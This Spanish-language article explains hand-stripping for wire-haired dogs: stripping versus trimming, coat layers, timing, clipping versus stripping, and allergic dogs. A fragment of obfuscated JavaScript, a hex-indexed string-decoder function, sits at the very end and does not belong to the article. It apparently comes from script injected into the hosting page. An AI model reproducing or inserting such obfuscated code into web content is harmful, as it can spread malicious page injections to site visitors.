El stripping es una técnica de renovación del manto en perros de pelo duro.
La técnica consiste en arrancar la capa de pelo maduro que ya no está sujeto a la raíz y es fácil de arrancar.
Si estos perros vivieran de forma salvaje, el stripping se haría solo al pasar entre las zarzas o al meterse en las madrigueras, pero al ser animales caseros, tenemos que usar nuestros dedos.
Gracias al stripping conseguimos que la textura (en vez de pelo duro pelo lanoso), el color y el brillo del pelo no se pierda (colores negros se vuelven grises y mates, los marrones fuertes se vuelven marrones claros y mates…). Además, esto ayuda a que el poro no se sature de pelo que no debería permanecer ahí y puedan formarse algún tipo de infección.
Diferencias entre stripping y trimming:
Parece ser que stripping en su definición más precisa, significa «arrancar totalmente el pelo y el subpelo» del perro hasta desnudarlo.
Hay muchos profesionales que reservan estrictamente el término stripping sólo para el arrancado total.
Utilizan el término trimming para englobar el arrancado no integral, por tanto todo el arrancado de mantenimiento y, también los trabajos a máquina y tijera que se practican especialmente en los perros de pelo duro.
Al vulgarizarse, se tiende a utilizar el término stripping para referirse al arrancado de pelo y subpelo sin precisión de grado o medida. Comparte así con el término trimming su contenido substancial: «mantener el pelo arrancándolo».
Pero realmente trimming significa el arreglo en su totalidad de cualquier perro, utilizando las técnicas que sean necesarias.
Cuando ocurren estas cosas, cuando los términos se vulgarizan y pierden precisión, o incluso cuando, como en este caso, se solapan, debemos ser tolerantes, porque lo único que interesa es entenderse. Lo importante es saber a qué se está refiriendo nuestro interlocutor cuando emplea cualquiera de estos términos.
El manto de un perro de pelo duro lo forman varias capas de pelo:
– El subpelo/lana
– Segunda capa de pelo duro, capa jóven y en proceso de maduración
– Primera capa, cobertura formada por pelo viejo y maduro
Según la raza, su standard exige mantener el subpelo o quitarlo por completo.
La primera sesión de stripping en un cachorro de exposición no tiene fecha. Se puede empezar por ir arrancando los 4 pelitos mal puestos que siempre tienen los cachorros, de forma que el pelo que va creciendo va cogiendo más dureza.
En cuanto el perro ya es adulto, antes de la primera exposición, algunos les hacen un innecesario stripping radical, porque 3-4 meses antes de la exposición se le arrancan todas las capas de pelo duro y se le deja calvo. A partir de ahí, el mantenimiento se hace cada semana.
La primera sesión de stripping en un cachorro sólamente de compañía depende de la genética del perro. Hay perros que empiezan a tener pelo duro a los 3 meses pero hasta los 5 meses no está maduro, o que hasta los 10 meses-1 año no empiezan a sacar pelo duro. Lo que hacemos es renovar todo el pelo que podamos sin dejar ninguna calva. Igualmente, podemos conseguir un manto de exposición sin realizar un desnudado completo.
La capa de pelo duro tarda alrededor de las 8 semanas en madurar, momento en el que es necesario repetir el arrancado.
Para perros con subpelo (westies, schnauzers…) es aconsejable el mantenimiento mensual para deslanar y ayudar al pelo de cobertura a que crezca fuerte, de lo contrario, en dos meses podríamos encontrarnos una cantidad de subpelo innecesario y un pelo duro bastante debilitado.
LA IMPORTANCIA DEL STRIPPING
Diferencia visual entre un corte a máquina y otro a stripping:
Ambos perritos son schnazer mini negro y plata, pero uno se ha quedado gris con el paso del tiempo y de la máquina. Cuando no cuidamos adecuadamente un pelo duro perdemos: textura, color y brillo, además de ganar problemas en la piel. Esto se debe a que al pasar la máquina o tijera cortamos todo el pelo, sin diferenciar capa dura ni subpelo. El poro no se oxigena y la capa dura no consigue nutrirse lo suficiente para alcanzar su textura, ya que tiene hasta QUINCE pelos de subpelo en su poro, robándole sus nutrientes. Además, para que el folículo trabaje adecuadamente necesita el largo natural del pelo, y cuando lo modificamos usando herramientas que cortan por debajo de su largo natural, estamos atrofiando los mecanismos de crecimiento del pelo y nutrición de la piel, provocando a su vez problemas dermatológicos como alopecias, dermatitis, seborreas, malasecias…
ES UN MITO aquello de que el stripping se hace sólo si vas a llevar a tu perro a concursos. El stripping es una técnica de arreglo como es la de tijera, máquina o el cepillado. Las técnicas se crean y modernizan para realizar el correcto mantenimiento de cada tipo de manto.
También es totalmente mentira que el stripping no se puede hacer en verano o que viene bien alternar con máquina. La máquina puede tener un resultado catastrófico estropeando el perro y haciéndolo totalmente irrecuperable.
En ESTE ARTÍCULO explicamos las consecuencias de cortarles con máquina.
ALERGIAS
Los perros alérgicos tienen una predisposición genética a serlo.
No hagamos caso a los mitos del stripping mal hecho o la máquina.
¿Qué pasa cuando tenemos un perro alérgico?
Primero deben descubrir a qué se debe la alergia y poner tratamiento.
Si con el tratamiento mejora, podemos intentar el stripping alguna sesión más y ver qué resultados obtenemos.
Si no vemos mejoría en ninguno de los casos, lo mejor es abandonar el stripping.
La piel está enferma y no podemos machacarla con el arrancado.
Lo que haremos será deslanar lo que podamos (cuidando la piel) y hacer el arreglo a TIJERA.
Podemos confundir procesos alérgicos en casos de recuperación, donde la piel está muy ahogada. El arrancado/deslanado provoca irritación (foliculitis) y, en ocasiones, se forman costritas. Esto no es sólo debido al stripping. La cosmética, en contacto con zonas de piel sensibles, pueden provocar estas reacciones, y que son visibles unas horas después del stripping. En ese caso, es imprescindible avisar al peluquero para tener especial cuidado en esas zonas y no utilizar colonias ni sprays la próxima vez.
En cualquier otro problema de piel el stripping es más que recomendable puesto que, como ya hemos explicado antes, una técnica inadecuada puede provocar problemas dermatológicos que, volviendo a la técnica natural, podemos conseguir grandes resultados.
function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}